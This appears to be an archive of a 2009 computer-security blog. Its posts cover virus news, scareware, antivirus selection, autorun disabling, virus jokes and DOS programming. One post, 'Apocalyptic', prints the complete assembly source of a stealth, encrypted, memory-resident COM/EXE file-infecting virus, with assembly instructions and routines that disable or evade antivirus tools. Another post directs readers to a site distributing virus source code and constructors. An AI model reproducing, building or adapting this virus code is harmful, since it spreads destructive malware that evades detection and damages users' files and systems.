The recent incidences shows that even the most systems that we think to be highly secured are vulnerable to virus attacks. The incident in which the French Navy's fighter planes were unable to download their fight plans as the databases were attacked by a Microsoft virus.

However, the French navy admitted that during the time it took to disinfect the virusThe incident forced the defence authorities to use the traditional systems like telephone, fax and post. Naval officials said the infection was probably due more to negligence than a deliberate attempt to compromise French national security. It said it suspected someone at the navy had used an infected USB key

Antivirus 2009- A new virus

2009-02-18T23:13:00.000-08:00

A new threat that comes disguised as a genuine antivirus program has become
increasingly prevalent . Offering to scan and remove malware from your
PC, this rogue will actually install a Trojan on your unsuspecting system. The process is usually initiated when you click a link for what you believe is valid security software or its vendor's site.
Such adverts are not only a nuisance when browsing online -- fake ads appear on reputable sites that make use of third-party advertising -- but they are designed to rip off consumers by tempting them to pay for a worthless program. Worse still, these rogue applications infect your PC with a problem they claim can only be 'fixed' by purchasing extra software.

If you have fallen victim to this virus hoax, stop by the Help Desk immediately to reserve time for virus removal from your system.

Mysterious New Computer Virus May Be 'Sleeper' Agent

2009-02-17T23:13:00.000-08:00

A computer virus that may leave Microsoft Windows users vulnerable to digital hijacking is spreading through companies in the U.S., Europe and Asia, already infecting close to 9 million machines, according to a private online security firm.

Though computer bugs have become a common affliction, Finland-based F-Secure says a virus it has been tracking for the past several weeks has surged more rapidly through corporate networks than anything they've seen in years. But the virus doesn't appear to be working as its designers intended.

F-Secure's chief security adviser, Patrik Runald, said the virus's coding suggests a type of bug that alerts computer users to bogus infections on their machines and offers to help by selling them antivirus software. Instead, the virus is simply spreading to little effect, though it may still pose a threat to infected computers.

Microsoft issued a security update Tuesday to deal with the so-called "Downadup" or "Conficker" virus, which appears to be a new version of a bug that popped up in October. "Over the last couple of weeks, a new variant of this worm has been affecting customers," the company acknowledged in a blog post.

Microsoft said the virus is spreading by gaining access to one computer and then guessing at passwords of other users in the same network: "If the password is weak, it may succeed."

A company representative couldn't immediately be reached Saturday to comment on F-Secure's estimate of infected machines. Most computers with Windows will automatically download Microsoft's security update, but Hypponen said the virus disables updates on infected machines. While the origin of the virus is a mystery, F-Secure's best guess is it came from Ukraine.

Beware of Hackers

2009-02-17T00:39:00.000-08:00

Are you sure that you are safe while browsing the internet or while downloading anything from the internet. The anti-malware software you are downloading may be a malware or may contain malware. The hackers are now using the popular names (names of the celebrity)for making the people to download the malware or the spyware made by them. One such example is in the popular news aggregator Digg. there are reports saying that there were 52 accounts posting news stories or comments with malicious URLs. Many of these accounts purport to be news items about celebrities, including actors Christian Bale and Alyssa Milano, singer Britney Spears and Paris Hilton. They contain a link to a video about the celebrity that takes victims to the sites that downloads the Adware/VideoPlay fake anti-malware, or scareware, package when the user clicks on it. Digg reported that it have terminated more than 300 malware accounts.The Digg attacks download the MS Antispyware 2009 scareware package to victims' PCs. This pretends to scan the PCs, then tells that the computer is infected with malware. It then asks the victim to pay money through the credit card for removing the malware. The malware creators also owns blogs. They post real and fake stories about the celebrities for getting the attention of the viewer quickly. So be care in using internet and while downloading from the internet. Download only from the trusted source.

Apocalyptic

2009-02-16T03:01:00.000-08:00

This post is about an old virus Apocalyptic. It will be detected by almost all the antivirus softwares. It appeared in 1996.

The important characteristics of this virus is:

-TSR appending Com/Exe infector
-Has a routine to encrypt and another to decrypt ( ror+add+xor )
-Stealth ( 11h/12h/4eh/4fh/5700h )
-Deactivates Tbdriver when going into mem and when infecting
-Makes the int 3h point to the int21h on infection
-Fools f-prot's 'stealth detection'
-Non-detectable ( in 2nd generation ) by Tbav 7.05, F-prot 2.23c, Scan,
-Avp and else. TbClean doesn't clean it ( it gets lost with the Z Mcb
-searching loop,... really that product is a shit )
-Payload: On 26th of July it shows all file with size 029Ah ( 666 )

To assemble the virus code, use:

Tasm virus.asm
Tlink virus.obj
Please do not think that I am promoting the creation of virus. The details I have given is available on the internet for the public. The source code of Apocalyptic is given below:

.286
HOSTSEG segment BYTE
ASSUME CS:HOSTSEG, SS:CODIGO

Host:
mov ax,4c00h
int 21h

ends

CODIGO segment PARA
ASSUME CS:CODIGO, DS:CODIGO, SS:CODIGO

virus_size equ virus_end-virus_start
encrypt_size equ encrypt_end-encrypt_start

virus_start label byte

org 0h

Letsrock:
call delta ; Entry for Com/Exe
delta:
mov si,sp ; �-offset
mov bp,word ptr ss:[si]
sub bp,offset delta
push es ax ds

push cs
pop ds
call tomacha ; I don't call encryption
;on first generation

Encrypt_start label byte

;***************************************************************************
; RESIDENCE
;***************************************************************************

goon:
push es
call tbdriver ; Deactivate TbDriver

mov ah,52h ; Pick list of lists
int 21h
mov si,es:[bx-2] ; First MCB
mov es,si

Mcb_Loop:
cmp byte ptr es:[0],'Z' ; I search last Mcb.
je got_last
cont: add si,es:[3]
inc si
mov es,si
jmp Mcb_Loop

got_last:
pop dx
cmp word ptr es:[1],0h ; Is it free ?
je go_on
cmp word ptr es:[1],dx ; Or with active Psp ?
jne exit
go_on:
cmp word ptr es:[3],((virus_size+15)/16)+1
jb exit ; Is there space for me ?

push es ; If there is, I get resident
pop ds
mov di,es
add di,word ptr es:[3] ; Residence stuff; nothing
sub di,((virus_size+15)/16) ;special
push di
mov es,di
xor di,di
xor si,si
mov cx,8
rep movsw

pop di
inc di
mov word ptr es:[3],((virus_size+15)/16)+1
mov word ptr es:[1],di

mov byte ptr ds:[0],'M'
sub word ptr ds:[3],((virus_size+15)/16)+1
mov di,5
mov cx,12
xor al,al
rep stosb

push es cs
pop ds ax
inc ax
push ax
mov es,ax
xor di,di
mov si,bp
mov cx,(virus_size)
rep movsb

mov ax,3521h
int 21h
pop ds
mov ds:word ptr [int21h],bx
mov ds:word ptr [int21h+2],es
mov ah,25h
lea dx,main_center
int 21h

;***************************************************************************
; RETURN TO HOST
;***************************************************************************

exit:
pop ds ax es

dec byte ptr [flag+bp] ; Was it a Com ?
jz era_un_com

mov si,ds ; Recover stack
add si,cs:word ptr [ss_sp+bp]
add si,10h
cli
mov ss,si
mov sp,cs:word ptr [ss_sp+bp+2]
sti

mov si,ds ; Recover CS:IP
add si,cs:word ptr [cs_ip+bp+2]
add si,10h
push si
push cs:word ptr [cs_ip+bp]

retf ; Return to host

era_un_com:
mov di,100h ; If it's a Com, I make
push di ;it to return
lea si,bp+ss_sp
movsw
movsb
ret

condiciones:
push cx dx ; Payload trigger
mov ah,02ah ; Activates on 26th july
int 21h
cmp dx,071Ah
pop dx cx
jnz nain
stc
ret
nain:
clc
ret

;***************************************************************************
; TBDRIVER
;***************************************************************************

Tbdriver:
xor ax,ax ; Annulates TBdriver,...
mov es,ax ;really, this Av is a
les bx,es:[0084h] ;megashit.
cmp byte ptr es:[bx+2],0eah
jnz volvamos
push word ptr es:[bx+3]
push word ptr es:[bx+5]
mov es,ax
pop word ptr es:[0086h]
pop word ptr es:[0084h]
volvamos: ret

;***************************************************************************
; STEALTH 05700h
;***************************************************************************

Stealth_tiempo:
pushf
call dword ptr cs:[Int21h] ; Calls Int21h
push cx
and cl,01fh
xor cl,01fh
pop cx
jnz nada
or cl,01fh ; Changes seconds
nada:
retf 2

;****************************************************************************
; FCB STEALTH
;****************************************************************************

FCB_Stealth:

pushf ; Stealth of 11h/12h, by
call dword ptr cs:[Int21h] ;FCBs
test al,al
jnz sin_stealth

push ax bx es

mov ah,51h
int 21h
mov es,bx
cmp bx,es:[16h]
jnz No_infectado

mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al
jnz Normal_FCB
add bx,7h
Normal_FCB:
mov al,es:[bx+17h]
and al,1fh
xor al,1fh
jnz No_infectado

sub word ptr es:[bx+1dh],Virus_size ; Old lenght of
sbb word ptr es:[bx+1fh],0 ;file and "normal"
and byte ptr es:[bx+17h],0F1h ;seconds

No_infectado:
call condiciones
jnc sin_nada

mov word ptr es:[bx+1dh],029Ah ; Virus's payload
mov word ptr es:[bx+1fh],0h

sin_nada:
pop es bx ax
Sin_stealth: retf 2

;****************************************************************************
; INT 21h
;****************************************************************************

main_center: ; The main center !
cmp ax,5700h
jz stealth_tiempo
cmp ah,11h
jz fcb_stealth
cmp ah,12h
jz fcb_stealth
cmp ah,4eh
jz handle_stealth
cmp ah,4fh
jz handle_stealth
cmp ah,4bh
je ejecutar
jmp saltito

;****************************************************************************
; HANDLE STEALTH
;****************************************************************************

handle_stealth:

pushf ; Handle stealth, functions
call dword ptr cs:[Int21h] ;4eh/4fh
jc adios_handle

pushf
push ax es bx cx

anti_antivirus:

mov ah,62h
int 21h

mov es,bx ; Is it F-prot ?
mov es,word ptr es:[2ch]
xor bx,bx
mov cx,100h
fpr:
cmp word ptr es:[bx],'-F'
jz sin_infectar ; Si lo es, pasamos de hacer
inc bx ;el stealth
loop fpr

mov ah,2fh
int 21h

mov al,es:[bx+16h]
and al,1fh
xor al,1fh
jnz sin_infectar

sub word ptr es:[bx+1ah],Virus_size ; Subs virus size
sbb word ptr es:[bx+1ch],0 ;and places coherent
and byte ptr es:[bx+16h],0F1h ;seconds

sin_infectar:
call condiciones
jnc no_payload

mov word ptr es:[bx+1ah],029Ah ; payload
mov word ptr es:[bx+1ch],0h
no_payload:
pop cx bx es ax
popf
adios_handle:
retf 2

;****************************************************************************
; EXE INFECTION
;****************************************************************************

ejecutar:
pushf
push ax bx cx dx si di ds es bp

mov di,ds
mov si,dx

call tbdriver ; deactivates TbDriver

mov ax,3503h ; Int 3h points to the
int 21h ;int 21h: less size and we
push cs ;fuck'em a bit
pop ds
mov ah,25h
lea dx,saltito
int 21h
push es bx ax

mov ax,3524h ; We handle int 24h
int 3h
mov ah,25h
lea dx,int24h
int 3h
push es bx ax

mov ds,di
mov dx,si

Noloes:
mov ax,4300h ; Saves and clears file
int 3h ;attributes
mov ax,4301h
push ax cx dx
xor cx,cx
int 3h

vamos_a_ver_si_exe:

mov byte ptr [flag],00h
mov ax,3d02h ; Opens file
int 3h
jc we_close

infect: xchg ax,bx

push cs
pop ds
mov ah,3fh ; Reads header
mov cx,01ch
lea dx,cabecera
int 3h

mov al,byte ptr [cabecera] ; Makes comprobations
add al,byte ptr [cabecera+1]
cmp al,'M'+'Z'
jnz go_close
cmp word ptr [cabecera+18h],40h
jz go_close
cmp word ptr [cabecera+1ah],0
jnz go_close ; If it's all right, goes on
jmp conti

go_close:
mov ds,di
mov dx,si

buscar_final: cmp byte ptr ds:[si],0 ; Searches end in ds:si
je chequeo
inc si
jmp buscar_final

chequeo:
push cs ; Is it a .COM ?
pop es
lea di,comtxt
sub si,3
cmpsw
jne we_close
jmp infeccion_com

we_close:
jmp close

conti:
mov ax,5700h ; Time/date of file
push ax
int 3h
push dx cx
and cl,1fh
xor cl,1fh
jz close_ant

call pointerant
cmp ax,0200h
ja contt
noinz: xor si,si ; To avoid changing
jmp close_ant ;date of non-infected
;files
contt:

push ax
pop si
shr ax,4
shl dx,12
add dx,ax
sub dx,word ptr ds:cabecera+8
push dx

and si,0fh
push si
call copy
pop si

pop dx
mov ds:word ptr [cs_ip+2],dx
inc dx
mov ds:word ptr [ss_sp],dx
mov ds:word ptr [cs_ip],si
mov ds:word ptr [ss_sp+2],((virus_size+100h-15h)/2)*2

call pointerant

mov cx,200h
div cx
inc ax
mov word ptr [cabecera+2],dx
mov word ptr [cabecera+4],ax
mov word ptr [cabecera+0ah],((virus_size)/16)+10h

mov ax,4200h
call pointer
mov cx,1ch
lea dx,cabecera
push cs
pop ds
mov ah,40h
int 3h

close_ant:
pop cx dx ax
or si,si
je close
inc ax
or cl,1fh
int 3h

close:

pop dx cx ax ; Attributes
inc ax
int 21h

mov ah,03eh
int 3h

nahyuck:

pop ax dx ds ; Restores Int 24h y 3h
int 3h
pop ax dx ds
int 3h

pop bp es ds di si dx cx bx ax
popf
jmp saltito

Pointerant:
mov ax,4202h
Pointer:
xor cx,cx
cwd
int 3h
ret

;****************************************************************************
; COM INFECTION
;****************************************************************************

infeccion_com:

mov ax,3d02h ; Open
int 3h
jc close
xchg bx,ax

push cs
pop ds

mov byte ptr [flag],1h ; To make the virus know it's
;a com when restoring
mov ax,5700h ; Time/date
push ax
int 3h
push dx cx
and cl,1fh
xor cl,1fh
jz close_ant

quesiquevale:
mov ah,3fh ; Reads beggining of file
mov cx,3
lea dx,ss_sp
int 3h

call pointerant ; Lenght check
cmp ax,0200h
ja puedes_seguir
cmp ax,(0ffffh-virus_size-100h)
jna puedes_seguir
alnoin: jmp noinz

puedes_seguir:
sub ax,3
mov word ptr [cabecera],ax

call copy ; Appending

mov ax,4200h
call pointer

mov ah,40h ; Jumping to code at
lea dx,salt ;beggining
mov cx,3h
int 3h

jmp close_ant

;****************************************************************************
; DATA
;****************************************************************************

autor: db 'Apocalyptic by Wintermute/29A'
comtxt: db 'COM'
flag: db 0
salt: db 0e9h
cabecera: db 0eh dup (90h)
SS_SP: dw 0,offset virus_end+100h
Checksum: dw 0
CS_IP: dw offset host,0
Cequis: dw 0,0,0,0

Encrypt_end label byte

copy:
push cs
pop ds
xor bp,bp ; Don't let bp fuck us
call encryptant ; Encrypts
mov ah,40h ; Copies
mov cx,virus_size
lea dx,letsrock
int 3h
call deencrypt ; Deencrypts
ret

;****************************************************************************
; ENCRYPT ROUTINE
;****************************************************************************

encryptant:
lea si,encrypt_end ; Encrypts
mov cx,encrypt_size
enc_loop: mov dl,byte ptr [si]
sub dl,2h
xor dl,0f9h
ror dl,4
mov byte ptr [si],dl
dec si
loop enc_loop
ret

deencrypt:
lea si,encrypt_end+bp ; Deencrypts
mov cx,encrypt_size
mov di,8
encri: mov dl,byte ptr [si]
mov al,dl
rol dl,4
xor dl,0f9h
add dl,2h
mov byte ptr [si],dl
dec si
loop encri
ret

Int24h: mov al,3
ret
Saltito: db 0eah
int21h: dw 0,0

virus_end label byte

tomacha:
mov cs:word ptr encrypt_start-2+bp,deencrypt-encrypt_start
ret
; This is cause I don't like putting a stupid flag,
; this two commands won't be copied

CODIGO ends
END Letsrock

VSTACK segment para STACK 'Stack'

db 100h dup (90h)

ends

Some New Viruses

2009-02-15T00:39:00.000-08:00

OPRAH WINFREY VIRUS:
Your 200MB hard drive suddenly shrinks to 80MB, and then slowly expands back to 200MB.

AT&T VIRUS:
Every three minutes it tells you what great service you are getting.

MCI VIRUS:
Every three minutes it reminds you that you're paying too much for the AT&T virus.

PAUL REVERE VIRUS:
This revolutionary virus does not horse around. It warns you of impending hard disk attack---once if by LAN, twice if by C:>.

POLITICALLY CORRECT VIRUS:
Never calls itself a "virus", but instead refers to itself as an "electronic microorganism."

RIGHT TO LIFE VIRUS:
Won't allow you to delete a file, regardless of how old it is. If you attempt to erase a file, it requires you to first see a counselor about possible alternatives.

ROSS PEROT VIRUS:
Activates every component in your system, just before the whole darn thing quits.

MARIO CUOMO VIRUS:
It would be a great virus, but it refuses to run.

TED TURNER VIRUS:
Colorizes your monochrome monitor.

ARNOLD SCHWARZENEGGER VIRUS:
Terminates and stays resident. It'll be back.

DAN QUAYLE VIRUS #2:
Their is sumthing rong wit your komputer, ewe jsut cant figyour out watt!

GOVERNMENT ECONOMIST VIRUS:
Nothing works, but all your diagnostic software says everything is fine.

NEW WORLD ORDER VIRUS:
Probably harmless, but it makes a lot of people really mad just thinking about it.

FEDERAL BUREAUCRAT VIRUS:
Divides your hard disk into hundreds of little units, each of which does practically nothing, but all of which claim to be the most important part of your computer.

GALLUP VIRUS:
Sixty percent of the PCs infected will lose 38 percent of their data 14 percent of the time. (plus or minus a 3.5 percent margin of error.)

TERRY RANDALL VIRUS:
Prints "Oh no you don't" whenever you choose "Abort" from the "Abort" "Retry" "Fail" message.

TEXAS VIRUS:
Makes sure that it's bigger than any other file.

ADAM AND EVE VIRUS:
Takes a couple of bytes out of your Apple.

CONGRESSIONAL VIRUS:
The computer locks up, screen splits erratically with a message appearing on each half blaming the other side for the problem.

AIRLINE VIRUS:
You're in Dallas, but your data is in Singapore.

FREUDIAN VIRUS:
Your computer becomes obsessed with marrying its own motherboard.

PBS VIRUS:
Your programs stop every few minutes to ask for money.

ELVIS VIRUS:
Your computer gets fat, slow and lazy, then self destructs; only to resurface at shopping malls and service stations across rural America.

OLLIE NORTH VIRUS:
Causes your printer to become a paper shredder.

NIKE VIRUS:
Just does it.

SEARS VIRUS:
Your data won't appear unless you buy new cables, power supply and a set of shocks.

JIMMY HOFFA VIRUS:
Your programs can never be found again.

CONGRESSIONAL VIRUS #2:
Runs every program on the hard drive simultaneously, but doesn't allow the user to accomplish anything.

KEVORKIAN VIRUS:
Helps your computer shut down as an act of mercy.

IMELDA MARCOS VIRUS:
Sings you a song (slightly off key) on boot up, then subtracts money from your Quicken account and spends it all on expensive shoes it purchases through Prodigy.

STAR TREK VIRUS:
Invades your system in places where no virus has gone before.

HEALTH CARE VIRUS:
Tests your system for a day, finds nothing wrong, and sends you a bill for $4,500.

GEORGE BUSH VIRUS:
It starts by boldly stating, "Read my docs....No new files!" on the screen. It proceeds to fill up all the free space on your hard drive with new files, then blames it on the Congressional Virus.

CLEVELAND INDIANS VIRUS:
Makes your 486/50 machine perform like a 286/AT.

LAPD VIRUS:
It claims it feels threatened by the other files on your PC and erases them in "self defense".

CHICAGO CUBS VIRUS:
Your PC makes frequent mistakes and comes in last in the reviews, but you still love it.

ORAL ROBERTS VIRUS:
Claims that if you don't send it a million dollars, it's programmer will take it back.

Windows 7: Security

2009-02-13T19:23:00.000-08:00

Most of the viruses were created for windows. So more security features has to be added to defend the system from virus and malware threats. The newer version of Windows are less vulnerable to virus attacks. Windows Vista incorporates several security features which makes it more secure from virus attacks. It has been developed to tackle with the viruses that spread through the removable media such as pen drives, CDs etc. Windows 7 extends this protection to cover removable drives with BitLocker ToGo.The new Internet Explorer 8 will sport new security features such as InPrivate Browsing that allows you to surf the Web in full anonymity a SmartScreen feature to protect against phishing attacks.
But there are limitations also in Windows 7. In Windows Vista the user was informed with a pop-up window and ask for his confirmation if a program tries to change any thing in the OS. But this feature became a irritation to most of the users. This feature has been modified to a great extend. Now the pop-up will appear a fewer times. Some people reported that this modification may let the malware to hide in the OS securely. The pop-ups appear only when a software makes changes to itself automatically. There are criticism about the administrator account. Some people argue that some software can modify the account settings and it can take the administrator account and gets the control of the whole computer. More security features are incorporated in Windows Vista. But the pop-ups that warned that asks the user's confirmation were disliked by many users.

You will get more information about the BitLocker ToGo from PCMAG.COM

Reading the memory size

2009-02-13T18:49:00.000-08:00

In the older post I have told that the memory size of the RAM is calculated during the RAM test performed during the Booting. The size of the RAM is stored in the memory location 0x413 and 0x414. Here is a C program which calculates the memory size of your RAM in KB. The limitation of this program is that it shows the memory size excluding the expanded and extended memory. It only shows size only up to 640 KB. If you are using the RAM which has more capacity, it shows the 640 as your RAM size. The program is shown below:

#include
#include

void main()
{
int far* mem;
mem=(int far*)0x413;
printf("\nBase memory size=%u KB",*mem);
getch();
}

There is another way to find out the RAM size. This way also have the above mentioned limitations. The below is a CPP program which calculates the RAM size by using the function biosmemory().

#include
#include
#include

void main()
{
int mem;
mem=biosmemory();
cout<<"The size of your RAM is:"<getch();
}

Note that the output of the program is limited to 640 KB

Virus attack at London hospitals

2009-02-04T04:09:00.000-08:00

Three hospitals in London are reported to shut down their entire computer network due to the infection by a variant of Mytob worm. The hospitals that are subjected to attack are St Bartholomew's (also known as Barts) in the City, the Royal London Hospital in Whitechapel and The London Chest Hospital in Bethnal Green. Some sources reports that these attacks are completely avoidable.
The virus infects the windows applications and spread itself to all the e-mail address of the infected computers. The hospitals have reported that the incident has affected the well being of the patients. There was no evidence in relation to the attacks on the safety of the patients. The manual systems have been implemented for the purpose of the restoring the computer services with top priority given to the patient service.
The trust says that they have used anti virus software and it was updated daily. But it was wrongly configured in some computers. This left open a back door through which the Mytob rapidly infiltrated the trust's network of 4,700 PCs. Anti-virus software companies have known about Mytob since 2005. Theatre operations were postponed, though they were immediately restored. Staff deferred patient appointments as doctors were unable to make safe and effective clinical decisions because they could not access diagnostic results on computers.

You will get more information from
http://www.bartsandthelondon.org.uk/formedia/press/release.asp?id=2054&sid=10
http://www.computerweekly.com/Articles/2009/01/28/234477/virus-attack-at-london-hospitals-was-entirely-avoidable.htm

AntiViruses: How to choose?

2009-02-01T04:24:00.000-08:00

An unprotected computer is like a bank without security. Thieves can easily loot money and valuable properties kept in it. The unprotected computer is easily vulnerable to attacks by several malicious software. Every year hundreds of malicious software like viruses, spyware, trojan etc are released into the cyberspace. Some people not even realize that malware is every where and avoiding infection by malware is a very difficult task. Sometimes they won't realize that they have became of a malware attack. There are several malwares roaming throught the internet. Most of them are spywares. The viruses are made by skilled and experienced programmers around the world. Some malwares are meant to destroy your computer or your reputation. More than eighty percent of the computers around the world are infected by malwares. These malwares are also domonated by the spywares.
Spywares are application that are installed in our computer pretending to be some useful program. The spyware are commonly installed in browsers and can read the username and the password we enter to access our accounts. There is another type of malware called rootkits. They are created by hackers for accessing your computer without your knowledge for some illegal activities. You may be blamed for the action performed by the hacker using the rootkit installed in your computer. For protecting the system from the hazards of malwares we have to install a proper AntiVirus softwares.

Things to be taken in to care while choosing an AntiVirus

There are different antiviruses available in the market. These antiviruses has its own advantages and limitations as they are produced by different companies. AntiViruses are available for different plateforms and requirements. Care should be taken in choosing the antivirus. Some useful tips in choosing the antivirus softwares are given below:

Capability of detecting malwares:

The capability of detecting alwares mostly depends on the database of the antivirus. If the database is large, it can detects more malwares. The database contains the codes of malwares. So as the number of entries increases, the size of the database increases and the software can detect more malwares.

Capability of cleaning or isolating the infected files:

Most of the antiviruses available today includes the capability of cleaning the infected files. If cleaning cannot be performed then the infected files are isolated. The capability of cleaning is different for different antivirses. Most of them cannot clean the infected file effectively. However they can effectively isolate the infected file. But this may result in the data loss or the malfunctioning of the some useful programs. So a powerful antivirus which has the caoability of cleaning the file has to be used.

User-Friendly:

Most of the antiviruses have very good graphical user interface. This allows the user to use the antivirus in the most effective way. He can exploit the antivirus to its maximum. Good user interface allows a person who has less knowledge about the computer to use the software effectively.

Availability of the updates:

Updating an antivirus is a very important thing to be taken care of. Most of the people think that there is not much use in updating the antivirus. Updating enables the antivirus software to detect new viruses. During updating the codes of the new viruses are entered into the database of the antivirus. So check for the availability of the updates. Most of the antiviruses provides updates periodically.

Refer the sites cintainig AntiVirus reviews:

These sites helps to choose the antiviruses according to our needs. They lists the advantages and limitaions of different antiviruses. I have given some of the sites below:

http://anti-virus-software-review.toptenreviews.com/
http://www.consumersearch.com/antivirus-software

http://www.pcantivirusreviews.com/
http://www.reviewcentre.com/products2167.html

Spam: know more?

2009-01-30T19:00:00.000-08:00

You may noticed that a folder named spam in your email account. Most of the people think that spam is only the email send by a person with another person's identity thereby hiding his own identity. Actually spam is anonymous as described above and is unsolicited bulk e-mail.
The spam is send by a person by hiding his own identity and provide the identity of another person. The receiver will think that the mail has come from the person whose identity is given by the person who created the spam. Generally the intention behind sending spam is to make money. The opening of the email will give the spammer a small amount of money for opening the mail by the recipient. Since the chance of opening the mail by the recipient is very low, spammers send the mail to more persons with fake identity. Fake identity is provided to make the recipient feel that the mail has come from the correct person or a person whom he trust. Often the legitimate mail resembles a spam. Spam message may include political messages, financial scams, etc. But the thing to be given most care is in the case of spams that carry some malwares.
Today the email traffic is dominated by the spams. Most of the spams are targeted to promote the selling of certain goods. But in most cases the selling of these goods are illegal like black market. But the user need not be aware of this illegal trade. In some cases the spams informs the recipient that he had won a cash prize and for the transfer of the amount the recipient must give the details of his bank account. If the recipient sent the details of his bank account, the spammer can empty the bank account of the recipient. In such cases the spam is called scam.
There are different types of spams today. They include: Adult Content, Health, IT, Personal Finance, Education/Training.
Care must be given in handling the e-mail to avoid the spams. The spammers use the combination of words and numbers to create a fake email id. So your e-mail must be in such a way that it must be difficult for creating by the combination of words and numbers. Another thing is that you must maintain two e-mail addresses- one for public use like registering in forums, chating etc and other for your private use. The second one does not declared public. Do not open a message if you are sure that it is a spam. The opening of such messages may help the spammers to gather more information about your e-mail. Do not respond/reply to a spam. This will help the spammers more than what we think. Use a good filtering software for filtering the spam messages.

Beware of Trojans

2009-01-29T22:53:00.000-08:00

Trojans are the most dangerous among the malicious software. They have the capability of wide range of destruction of data and can even disable the software that are installed to defend the computer from trojans and viruses. As the internet became more sophisticated more and more types of trojans arosed. Hacker are responsible for the creation of trojans. Generally a trojan is masked by the author in some useful applications and allows the victim to download and use the software. The author may even declare that the use of product will not cause any harm to the computer. But the trojan attached to the software will do its job sincerely. It will send the data to the attackers computer. Using this data the attacker can validate several things including the browsing habit of the victim. Such trojans even send the private data to the attacker's computer. Some trojans kill the security software and make deals with several useful softwares like browsers for its action. Such trojan can take you to a fake site that looks like the original site and takes information like account number.

Most of the trojans were made for the purpose of spying. As many of you know that the trojan has two module: a server and the client. The sever is installed in the attacker's computer and the client is installed in the victim's computer. The client in the victim's machine send the data in the victim's computer to the server in the attacker's computer. Trojans have the capability to read the keystrokes from the victim's computer and send to the the attacker's computer. Some trojans even send the screen shot of the applications running in the victim's machine.
You can download several types of outdated trojans and easily detected by anti-trojan softwares from VX Heavens (http://vx.netlux.org/). This site also provide several viruses, worms, constructors, simulators, source codes of viruses and more...But keep in mind that making or promotion of malicious software is strictly illegal.
You can protect your system from trojans by installing the anti-trojan softwares. Today several anti-trojan softwares are available in the internet for downloading. It is always better to use a well updated anti-trojan in your system. You will get more information about trojan in http://www.anti-trojan.org/

Some useful links are given below:

http://www.anti-trojan-software-reviews.com/
Contains a survey of some of the top anti-trojan softwares

http://www.anti-trojan.org/
Gives you more information about trojans and related malicious softwares. The site also gives some anti-trojans for downloading.

http://ezinearticles.com/?How-Trojan-Virus-Threats-on-Your-Computer-Can-Put-Your-Financial-Information-at-Risk&id=1585959
This site contain an article about the trojan.

Disable Autoruns in XP and Vista

2009-01-28T05:07:00.000-08:00

You may know that most of the computer viruses infects the computer through the pen drives is due to the autorun. There are several softwares available in the market that can disable or kill the autoruns. Some anti viruses block the autoruns if the drive is infected. We can disable autoruns in XP and vista in a very easy way.You will take only a little time to disable autoruns in XP and Vista.
There are several methods available for disabling the autoruns. One method which works in both XP and Vista is given below.

Open a notepad and type the following:

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"

Save the notepad with '.reg' extension(eg:atrun.reg). While saving make sure that the type of file is set to 'All Files'.
Navigate to the saved location and open the file. Windows will display a message asking you wether you want to add these data to the registry. Click 'Yes'.

Vaccine For Virus

2009-01-23T06:35:00.002-08:00

Now let us look into how to cure the viruses. We have a problem here is that we do not have a generalized solution. We have to deal with different viruses in different manner. This made the task tougher. But there is no other option.

The first thing we have to know is the type of virus. The next thing we have to know is the working of the virus. The working of the virus can be studied by carefully examining the virus program. Now there are several decompilers and simulators are available for this purpose.

Now let us start with Bootstrap viruses. Suppose a Bootstrap virus copies the contents of the location side 0, track 0 and sector 1 to a location side 0, track 0 and sector 7 (this is in the case of Stone virus).

In this case, we know the location where the virus will copy the original program. So the solution is simple. Boot from a non-infected disk and copy the contents of the location side 0,track 0 and sector 7 to the normal location of side 0, track 0 and sector 1. In the case of the partition table infected by the virus, we can copy-paste or cut-paste the original boot programs to its correct location. But whatever you do to remove the virus from the hard disk or from the floppy, the entire work will be futile as long as the virus is active in the memory. One of the solution is to boot from a safe disk. Most of the anti-virus program try to delete the virus from the memory. Some will end in success while others request for a reboot to kill the virus before booting. If you Avast anti virus you may notice that sometimes the anti-virus shows a message for scheduling a boot scan informing that the virus is active in memory. However the above mentioned era has been gone.

Now we have to deal with advanced viruses. The file viruses are one among them. In the case of file viruses, it attach itself to a file. This is done in different methods. One is to reduce the base address of the file by the size of the virus and get copied to the present memory location of the file. In this case our job become tougher. One solution is to continuously monitoring the size of the file. But this solution would fall when we edit that file or when copy a file from a infected disk. Here there is another effective solution. Each virus has its own signature. Signature is a unique set of codes for each type of virus. By reading the contents of the memory location of the file we are able to check for the virus. If the virus signature is present, we can easily detect the viruses, only provided we should know the codes in the virus signature. This can be done simply by writing a program for reading from the memory and comparing the content of the memory with virus code. If all the code match with any of the part in the file memory, then we can cure the file by reading the file contents only and deleting the virus code. In the extreme case we have to delete the whole file.

Most of the anti-virus has two parts- a database and a program. The database contains the virus signatures and the program compares for a match in the file code and the virus codes. If any of the mismatch occur in the codes occur then the program will leave the entire block since there is no chance for the virus infection. This is the reason why most of the anti-virus requires updates. The updating will enable by adding the virus signatures of the newly found viruses to the anti-virus database and the the anti-virus program is modified for detecting the new viruses according to there method of infection.

So for protecting your PC from the attack of the viruses you have to install an updated anti-virus software and update it whenever it is required. Care should be taken in selecting the anti-virus. Before selecting the anti-virus you must make sure that the anti-virus detects latest viruses and updates are available from time to time.

Booting From An Infected Disk

2009-01-20T23:40:00.000-08:00

I for got to put a post on how the booting from an infected floppy disk or drive affects the computer. Now let us look into it. A infected disk means it contains potentially harmful files such as viruses or Trojans. If it is a bootable disk the virus may be in the boot sector of the disk which is a very dangerous condition. In the case of hard disks the virus may be in the partition table or boot sector or in both location. The virus in the infected boot disk ensures the original content of the boot sector are copied to a safe location so that it will not be lost easily.
Now let us checkout how the booting from an infected disk affects the computer. Before entering into this topic one must know about the booting procedure. (I have already put a post on booting from a non-infected disk. Click here to refer it.) It will be helpful if you refer it.
The various stages of the booting from infected disk is given below:
a)POST routines are executed.
b)Set up the Interrupt Service Routine Table (IVT).
c)The size of the RAM is calculated during the RAM test and the size is stored in the location 0x413 and 0x414.
d)Standard equipments are initialized.
e)Non standard equipments are initialized.
f)Reading the boot up sequence.
g)The contents in the boot sector are loaded into the main memory and the control is passed to the program in the main memory. In the infected disk virus will be loaded in to the main memory and the control is passed to the virus in the main memory.
